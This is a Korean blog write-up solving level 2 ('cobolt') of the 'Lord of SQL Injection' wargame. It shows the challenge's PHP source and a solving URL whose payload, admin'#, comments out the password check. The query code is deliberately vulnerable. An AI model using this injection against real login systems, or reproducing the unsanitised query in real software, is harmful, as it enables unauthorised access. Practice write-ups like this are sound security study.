[los.eagle-jump]Lord Of Sql Injection gremlin - 2번
Posted by bonggang | 2020. 6. 1. 17:12
문제
https://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php
문제 풀이
0. 소스 코드 확인
<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id'] == 'admin') solve("cobolt");
elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>";
highlight_file(__FILE__);
?>
1. 쿼리문 작성
1번 문제와 다르지 않다. 차이점은 id가 admin이라는 것 하나뿐이다.
id=admin으로 넣어준 후 뒷 문장을 다시 한 번 #으로 날려주면 된다.
정답:
https://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php?id=admin%27%23
'Security > Web' 카테고리의 다른 글
[Webhacking.kr] Challenge(old)- old24 (0) | 2020.06.04 |
---|---|
[los.eagle-jump]Lord Of Sql Injection gremlin - 3번 (0) | 2020.06.01 |
[los.eagle-jump]Lord Of Sql Injection gremlin - 1번 (0) | 2020.06.01 |
[Webhacking.kr] Challenge(old)- old26 (0) | 2020.06.01 |
[Webhacking.kr] Challenge(old)- old18 (0) | 2020.06.01 |
[Webhacking.kr] Challenge(old)- old-14 (0) | 2020.05.31 |
[Webhacking.kr] Challenge(old)- old-01 (0) | 2020.05.31 |
파일 업로드 공격 (0) | 2020.04.25 |